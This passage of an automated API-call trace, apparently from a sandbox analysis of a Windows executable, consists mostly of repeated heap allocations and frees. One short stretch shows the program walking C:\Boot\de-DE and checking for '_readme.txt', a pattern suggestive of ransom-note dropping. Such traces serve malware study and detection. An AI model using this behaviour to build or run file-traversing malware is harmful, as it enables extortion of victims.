hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.471] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.471] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.472] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.472] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.473] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.473] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.474] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.474] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.475] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.475] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.475] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.475] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.475] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.475] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.475] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.475] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.475] PathFindFileNameW (pszPath="") returned="" [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.475] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.475] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.475] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.475] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.476] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.476] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.476] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0146.476] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.476] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.476] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0146.477] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.477] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.477] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.477] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.477] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.477] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.477] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.478] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea87470, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.478] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.478] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.478] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.478] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, 